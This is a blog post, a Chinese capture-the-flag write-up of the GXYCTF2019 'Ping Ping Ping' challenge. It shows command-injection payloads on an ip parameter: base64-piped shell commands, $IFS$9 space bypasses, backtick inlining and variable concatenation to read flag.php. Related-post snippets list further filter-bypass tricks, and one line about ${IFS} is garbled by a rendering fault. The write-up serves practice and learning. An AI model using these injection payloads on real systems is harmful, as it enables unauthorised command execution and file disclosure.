Ping Ping Ping-[GXYCTF2019]ping ping ping

已于 2023-04-05 15:07:22 修改
阅读量81 收藏
点赞数
分类专栏: 命令执行 Web漏洞 文章标签: bash 开发语言
于 2023-04-05 14:49:06 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_56664029/article/details/129970686
版权

方法一,base64

在这里插入图片描述
取下来,可以ping通
用&试试
不行
用封号试试,可以了,有个flag.php
在这里插入图片描述
用base64编码试试

echo Y2F0IGtleS50eHQ=|base64 -d|sh

在这里插入图片描述
说不能有空格
${IFS}或者$IFS$9绕过,用到 I F S 的时候,又显示不能有符号 ! [ 在这里插入图片描述 ] ( h t t p s : / / i m g − b l o g . c s d n i m g . c n / 1 c d 61773449445 e 5 b 0 c 9 d 301248619 c 4. p n g ) 换成用 ‘ {IFS}的时候,又显示不能有符号 ![在这里插入图片描述](https://img-blog.csdnimg.cn/1cd61773449445e5b0c9d301248619c4.png) 换成用` IFS的时候,又显示不能有符号![在这里插入图片描述](https://imgblog.csdnimg.cn/1cd61773449445e5b0c9d301248619c4.png)换成用IFS$9`

经过一系列尝试时候,发现过滤了

在这里插入图片描述
好像可以了
在这里插入图片描述
补充一句
用bash的时候bash也被过滤了

在这里插入图片描述

方法二:内联

?ip=127.0.0.1;cat$IFS$9`ls`

查看源码
在这里插入图片描述

方法三、拼接绕过

这样发现不行
在这里插入图片描述

在这里插入图片描述
a跟b换个位置就可以了

?ip=127.0.0.1;b=ag.php;a=fl;cat$IFS$9$a$b

在这里插入图片描述

Wrypot
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
buuctf[GXYCTF2019]Ping Ping Ping
hintll的博客
03-21 5064
buuctf[GXYCTF2019]Ping Ping Ping 这个题目的标题是pingping盲猜是关于命令执行的题目 打开环境后 只有一个/ip=? 应该是提示用get的方式来传参一个地址执行ping的操作 直接ping127.0.0.1 回显ping127.0.0.1的数据 说明是一道命令执行的题目 执行:?ip=127.0.0.1|ls 其中|的作用是命令分隔符 还有相关的符号 ; --在 shell 中,是”连续指令” & --不管第一条命令成功与否,都会执行第二条命令 &
[GXYCTF2019]Ping Ping Ping1
weixin_61021815的博客
05-14 1610
进入页面没有什么东西,尝试填一下ip 可以 使用多命令执行符 ; 无论逻辑 && 命令1正确则命令2执行,命令1错误则命令2不执行 || 命令1错误命令2执行,命令2错误则命令1执行 构造?ip=127.0.0.1 ;ls 构造?ip=127.0.0.1;cat flag.php 发现存在过滤 空格 想办法绕过一下 1.${IFS} 2.$IFS$1 3.${IFS 4.%20 5.<和<>重定向符替换 6.%09替换 注:...
[GXYCTF 2019]Ping Ping Ping
m0_62422842的博客
05-08 7894
前言 最近在学习ssrf漏洞,这个漏洞的综合性还是挺强的。在网上看了大佬的文章总结的很详细。在此基础就通过实践相结合,更加深入的理解ssrf的具体操作。 SSRF漏洞 有一些函数比如
[GXYCTF2019]Ping Ping Ping
qq_37466661的博客
08-27 3346
[GXYCTF2019]Ping Ping Ping CTF 命令执行
[GXYCTF2019]Ping Ping Ping 1
qq_43618536的博客
07-01 2381
BUUCTF的[GXYCTF2019]Ping Ping Ping
ping的工作原理 782-801
05-15
"ping 的工作原理" ping 命令是基于 ICMP 协议工作的,因此要了解 ping 的工作原理,首先我们先来熟悉 ICMP 协议。ICMP 全称是 Internet Control Message Protocol,也就是互联网控制报文协议。 ICMP 的主要功能...
ping命令参数大全(-t,-a,-n,-l,-r)
10-31
ping命令是网络诊断中最常用的工具之一,用于检查网络连接的可达性和响应时间。它通过发送ICMP(Internet Control Message Protocol)回显请求报文到目标主机,并等待接收回应,从而评估网络的连通性。下面将详细...
ping命令cap-set-proc报错.不允许的操作
10-17
Ping 命令 Cap-set-proc 报错解决方案 Ping 命令是网络管理员最常用的诊断工具之一,但是在某些情况下,Ping 命令可能会出现 cap-set-proc 报错,无法正常工作。这个问题的根源是 Ping 命令需要使用 RAW SOCKET 包...
IP新技术进阶系列 - SRv6 Ping&Tracert深度解析
03-29
主要包含内容:组网方案、IS-IS全局配置、IS-IS接口配置、IS-IS路由计算、SRv6配置、IS-IS路由计算、查看各个设备的本地SID表、在PE间建立双向SRv6 TE Policy、查看SRv6 TE Policy状态、SRv6 Ping&Tracert介绍、逐段...
ping.exe-批量ping小工具
11-03
ping.exe是一款小巧而实用的批量ping工具,特别适合网络管理员和IT专业人士使用。它能够帮助用户快速地对多个IP地址进行ping操作,极大地提高了工作效率。在日常的网络管理工作中,ping命令是不可或缺的诊断工具,...
bash 笔记
waterHBO的博客
07-22 995
【代码】bash 笔记。
bash XXX.sh文件和直接运行XXX.sh的区别
m0_49448331的博客
07-22 375
【代码】bash XXX.sh文件和直接运行XXX.sh的区别。
Linux 4: Bash
weixin_48029567的博客
07-23 390
1 绝对路径、相对路径2 alias3 内置的builtin4 $PATH找到的第一个命令。
主流开发语言开发环境介绍
weixin_44215445的博客
07-23 1182
主流开发语言开发环境介绍
大学生挑战杯-喜树根器官培养和抗癌物质喜树碱生成的研究.rar
07-26
大学生挑战杯-喜树根器官培养和抗癌物质喜树碱生成的研究.rar
b278视频及游戏管理平台-springboot+vue.zip(可运行源码+sql文件+)
07-26
视频及游戏管理平台是一个很好的项目,结合了后端(Spring Boot)和前端(Vue.js)技术,实现了前后端分离。 视频及游戏管理平台是一个很好的项目,结合了后端(Spring Boot)和前端(Vue.js)技术,实现了前后端分离。 视频及游戏管理平台是一个很好的项目,结合了后端(Spring Boot)和前端(Vue.js)技术,实现了前后端分离。 视频及游戏管理平台是一个很好的项目,结合了后端(Spring Boot)和前端(Vue.js)技术,实现了前后端分离。 视频及游戏管理平台是一个很好的项目,结合了后端(Spring Boot)和前端(Vue.js)技术,实现了前后端分离。 视频及游戏管理平台是一个很好的项目,结合了后端(Spring Boot)和前端(Vue.js)技术,实现了前后端分离。
大模型应用-为Ollma开发的简单的HTML网页UI应用-附项目源码-优质项目实战.zip
07-26
大模型应用_为Ollma开发的简单的HTML网页UI应用_附项目源码_优质项目实战
基于JAVA局域网监听软件的设计与开发(源代码+论文).rar
07-26
基于JAVA局域网监听软件的设计与开发(源代码+论文).rar
小程序-光影娱乐带后台(源码).zip
最新发布
07-26
小程序-光影娱乐带后台(源码).zip
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值